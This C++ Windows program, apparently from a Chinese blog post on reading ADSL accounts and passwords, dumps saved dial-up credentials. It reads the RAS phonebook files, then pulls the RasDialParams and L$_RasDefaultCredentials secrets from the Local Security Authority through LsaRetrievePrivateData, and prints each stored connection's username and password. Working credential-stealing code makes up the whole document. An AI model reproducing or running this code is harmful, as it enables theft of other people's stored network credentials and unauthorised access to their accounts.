#include <windows.h>
#include<tchar.h>
#include<locale.h>
#include <ras.h>
#include <raserror.h>
#include <shlobj.h>
#include <ntsecapi.h>
#include <tchar.h>
#include <assert.h>
#include <Wtsapi32.h>
#pragma comment(lib,"rasapi32.lib")
#pragma comment(lib,"WtsApi32.lib")
#pragma pack(1)
typedef struct
{
TCHAR UID[256];
TCHAR pass[256];
TCHAR login[256];
BOOL used;
}PASSWORDS,*PPASSWORDS;
#pragma pop
//当前登录用户名
TCHAR m_lpCurrentUser[64];
int m_nUsed;
int m_nCount;
int m_nRasCount;
PASSWORDS*m_PassWords;
//获取宽带连接数目
DWORD GetRasEntryCount();
bool GetRasEntries();
void GetLsaPasswords();
LPTSTR UTF8ToGB2312(LPTSTR UTF8Str);
BOOL Set(LPTSTR DialParamsUID,LPTSTR Name,LPTSTR User,LPTSTR Password,LPTSTR PhoneNumber,LPTSTR Device);
LPTSTR GetLocalSid();
PLSA_UNICODE_STRING GetLsaData(LPTSTR KeyName);
void ParseLsaBuffer(LPCWSTR Buffer,USHORT Length);
void StringToLsaStr(LPTSTR AValue,PLSA_UNICODE_STRING lsa);<pre class="cpp" name="code">#include "head.h"
int main (void)
{
//获取当前登录用户名
LPTSTR szLogName=NULL;
DWORD dwSize=0;
if(WTSQuerySessionInformation(WTS_CURRENT_SERVER_HANDLE,WTS_CURRENT_SESSION,WTSUserName,&szLogName,&dwSize))
CopyMemory(m_lpCurrentUser,szLogName,ARRAYSIZE(m_lpCurrentUser));
else
return 0;
//获取宽带连接个数
m_nRasCount=GetRasEntryCount();
m_PassWords=new PASSWORDS[m_nRasCount];
ZeroMemory(m_PassWords,sizeof(m_PassWords));
m_nUsed=0;
m_nCount=0;
GetRasEntries();
return 0;
}
//获取宽带连接数目
DWORD GetRasEntryCount()
{
//变量定义
int nCount=0;
LPTSTR lpPhoneBook[2]={0};
TCHAR szPhoneBook1[MAX_PATH]={0},szPhoneBook2[MAX_PATH]={0};
//构造宽带连接.pbk文件路径
if(GetWindowsDirectory(szPhoneBook1,ARRAYSIZE(szPhoneBook1))==NULL)return 0;
_tcscpy(_tcschr(szPhoneBook1,'\\')+1,TEXT("Documents and Settings\\"));
_tcscat_s(szPhoneBook1,ARRAYSIZE(szPhoneBook1),m_lpCurrentUser);
_tcscat_s(szPhoneBook1,ARRAYSIZE(szPhoneBook1),TEXT("\\Application Data\\Microsoft\\Network\\Connections\\pbk\\rasphone.pbk"));
SHGetSpecialFolderPath(NULL,szPhoneBook2,CSIDL_COMMON_APPDATA,0);
_sntprintf_s(szPhoneBook2,ARRAYSIZE(szPhoneBook2),TEXT("%s\\%s"),szPhoneBook2,TEXT("Microsoft\\Network\\Connections\\pbk\\rasphone.pbk"));
//保存路径
lpPhoneBook[0]=szPhoneBook1;
lpPhoneBook[1]=szPhoneBook2;
//获取宽带连接个数
DWORD nSize=1024*4;
LPTSTR lpszReturnBuffer=new TCHAR[nSize];
for(int i=0;i<ARRAYSIZE(lpPhoneBook);i++)
{
memset(lpszReturnBuffer,0,sizeof(lpszReturnBuffer));
DWORD ttt=GetPrivateProfileSectionNames(lpszReturnBuffer,nSize,lpPhoneBook[i]);
for(LPTSTR lpSection=lpszReturnBuffer;*lpSection !='\0';lpSection+=_tcslen(lpSection)+1)
nCount++;
}
delete[] lpszReturnBuffer;
return nCount;
}
bool GetRasEntries()
{
//变量定义
int nCount=0;
LPTSTR lpPhoneBook[2]={0};
TCHAR szPhoneBook1[MAX_PATH]={0},szPhoneBook2[MAX_PATH]={0};
//构造宽带连接.pbk文件路径
if(GetWindowsDirectory(szPhoneBook1,ARRAYSIZE(szPhoneBook1))==NULL)return false;
_tcscpy_s(szPhoneBook1,ARRAYSIZE(szPhoneBook1),TEXT("Documents and Settings\\"));
_tcscat_s(szPhoneBook1,ARRAYSIZE(szPhoneBook1),m_lpCurrentUser);
_tcscat_s(szPhoneBook1,TEXT("\\Application Data\\Microsoft\\Network\\Connections\\pbk\\rasphone.pbk"));
SHGetSpecialFolderPath(NULL,szPhoneBook2,CSIDL_COMMON_APPDATA,0);
_sntprintf_s(szPhoneBook2,ARRAYSIZE(szPhoneBook2),TEXT("%s\\%s"),szPhoneBook2,TEXT("Microsoft\\Network\\Connections\\pbk\\rasphone.pbk"));
//保存路径
lpPhoneBook[0]=szPhoneBook1;
lpPhoneBook[1]=szPhoneBook2;
//验证版本号是一个已知的范围内的安全标识符(SID)
OSVERSIONINFO osi;
osi.dwOSVersionInfoSize=sizeof(OSVERSIONINFO);
GetVersionEx(&osi);
if(osi.dwPlatformId==VER_PLATFORM_WIN32_NT&&osi.dwMajorVersion>=5)GetLsaPasswords();
DWORD nSize=1024*4;
LPTSTR lpszReturnBuffer=new TCHAR[nSize];
for(int i=0;i <ARRAYSIZE(lpPhoneBook);i++)
{
memset(lpszReturnBuffer,0,nSize);
GetPrivateProfileSectionNames(lpszReturnBuffer,nSize,lpPhoneBook[i]);
for(LPTSTR lpSection=lpszReturnBuffer;*lpSection !='\0';lpSection+=_tcslen(lpSection)+1)
{
LPTSTR lpRealSection=UTF8ToGB2312(lpSection);
TCHAR strDialParamsUID[256];
TCHAR strUserName[256];
TCHAR strPassWord[256];
TCHAR strPhoneNumber[256];
TCHAR strDevice[256];
memset(strDialParamsUID,0,sizeof(strDialParamsUID));
memset(strUserName,0,sizeof(strUserName));
memset(strPassWord,0,sizeof(strPassWord));
memset(strPhoneNumber,0,sizeof(strPhoneNumber));
memset(strDevice,0,sizeof(strDevice));
int nBufferLen=GetPrivateProfileString(lpSection,_T("DialParamsUID"),0,strDialParamsUID,_countof(strDialParamsUID),lpPhoneBook[i]);
if(nBufferLen>0)
{//DialParamsUID=4326020 198064
for(int j=0;j<m_nRasCount;j++)
{
if(_tcscmp(strDialParamsUID,m_PassWords[j].UID)==0)
{
_tcscpy(strUserName,m_PassWords[j].login);
_tcscpy(strPassWord,m_PassWords[j].pass);
m_PassWords[j].used=TRUE;
m_nUsed++;
break;
}
}
}
GetPrivateProfileString(lpSection,_T("PhoneNumber"),0,strPhoneNumber,256,lpPhoneBook[i]);
GetPrivateProfileString(lpSection,_T("Device"),0,strDevice,256,lpPhoneBook[i]);
LPTSTR lpRealDevice=UTF8ToGB2312(strDevice);
LPTSTR lpRealUserName=UTF8ToGB2312(strUserName);
Set(strDialParamsUID,lpRealSection,lpRealUserName,strPassWord,strPhoneNumber,lpRealDevice);
delete[] lpRealSection;
delete[] lpRealUserName;
delete[] lpRealDevice;
}
}
delete[] lpszReturnBuffer;
return true;
}
//验证版本号是一个已知的范围内的安全标识符(SID)
void GetLsaPasswords()
{
PLSA_UNICODE_STRING PrivateData;
TCHAR Win2k[]=TEXT("RasDialParams!%s#0");
TCHAR WinXP[]=TEXT("L$_RasDefaultCredentials#0");
TCHAR temp[256]={0};
//win2000
wsprintf(temp,Win2k,GetLocalSid());
PrivateData=GetLsaData(temp);
if(PrivateData)
{
ParseLsaBuffer(PrivateData->Buffer,PrivateData->Length);
LsaFreeMemory(&PrivateData);
return;
}
//winxp
ZeroMemory(temp,ARRAYSIZE(temp));
wsprintf(temp,WinXP,GetLocalSid());
PrivateData=GetLsaData(temp);
if(PrivateData)
{
ParseLsaBuffer(PrivateData->Buffer,PrivateData->Length);
LsaFreeMemory(&PrivateData);
return;
}
}
LPTSTR UTF8ToGB2312(LPTSTR UTF8Str)
{
LPTSTR lpGBStr=new WCHAR[_tcslen(UTF8Str)+1];
wcscpy(lpGBStr,UTF8Str);
return lpGBStr;
}
BOOL Set(LPTSTR DialParamsUID,LPTSTR Name,LPTSTR User,LPTSTR Password,LPTSTR PhoneNumber,LPTSTR Device)
{
_tprintf(_T("Conn:%s\nUser:%s\nPass:%s\n"),Name,User,Password);
return TRUE;
}
LPTSTR GetLocalSid()
{
union
{
SID s;
TCHAR c[256];
}Sid;
DWORD sizeSid=sizeof(Sid);
DWORD sizeDomainName=256;
TCHAR DomainName[256];
SID_NAME_USE peUse;
LPTSTR pSid=NULL;
if(!m_lpCurrentUser)return NULL;
if(!LookupAccountName(NULL,m_lpCurrentUser,&Sid,&sizeSid,DomainName,&sizeDomainName,&peUse))return NULL;
if(!IsValidSid(&Sid))return NULL;
typedef BOOL (WINAPI*ConvertSid2StringSid)(PSID,LPTSTR*);
ConvertSid2StringSid proc=0;
HINSTANCE hLibrary=LoadLibrary(_T("advapi32.dll"));
if(hLibrary){
#ifdef _UNICODE
proc=(ConvertSid2StringSid)GetProcAddress(hLibrary,"ConvertSidToStringSidW");
#else
proc=(ConvertSid2StringSid)GetProcAddress(hLibrary,"ConvertSidToStringSidA");
#endif
if(proc){
proc(&Sid.s,&pSid);
FreeLibrary(hLibrary);
return pSid;
}else{
FreeLibrary(hLibrary);
return NULL;
}
}
return NULL;
}
PLSA_UNICODE_STRING GetLsaData(LPTSTR KeyName){
LSA_OBJECT_ATTRIBUTES LsaObjectAttribs;
LSA_HANDLE LsaHandle;
LSA_UNICODE_STRING LsaKeyName;
NTSTATUS nts;
PLSA_UNICODE_STRING OutData;
ZeroMemory(&LsaObjectAttribs,sizeof(LsaObjectAttribs));
nts=LsaOpenPolicy(NULL,&LsaObjectAttribs,POLICY_GET_PRIVATE_INFORMATION,&LsaHandle);
if(nts!=0)return NULL;
StringToLsaStr(KeyName,&LsaKeyName);
nts=LsaRetrievePrivateData(LsaHandle,&LsaKeyName,&OutData);
free(LsaKeyName.Buffer);
if(nts!=0)return NULL;
nts=LsaClose(LsaHandle);
if(nts!=0)return NULL;
return OutData;
}
void ParseLsaBuffer(LPCWSTR Buffer,USHORT Length)
{
TCHAR AnsiPsw[1024];
memcpy(AnsiPsw,Buffer,Length);
for(int i=0;i<Length/2-1;++i){
for(int j=0;j<10;++j){
switch(j){
case 0:
_tcscpy(m_PassWords[m_nUsed].UID,AnsiPsw+i);
break;
case 5:
_tcscpy(m_PassWords[m_nUsed].login,AnsiPsw+i);
break;
case 6:
_tcscpy(m_PassWords[m_nUsed].pass,AnsiPsw+i);
break;
}
i+=_tcslen(AnsiPsw+i)+1;
}
++m_nUsed;
}
}
void StringToLsaStr(LPTSTR AValue,PLSA_UNICODE_STRING lsa)
{
lsa->Length=_tcslen(AValue)*sizeof(TCHAR);
lsa->MaximumLength=lsa->Length;
lsa->Buffer=(PWSTR)malloc(lsa->MaximumLength*sizeof(TCHAR));
memcpy(lsa->Buffer,AValue,lsa->Length);
}
读取adsl帐号和密码
最新推荐文章于 2023-03-17 13:43:03 发布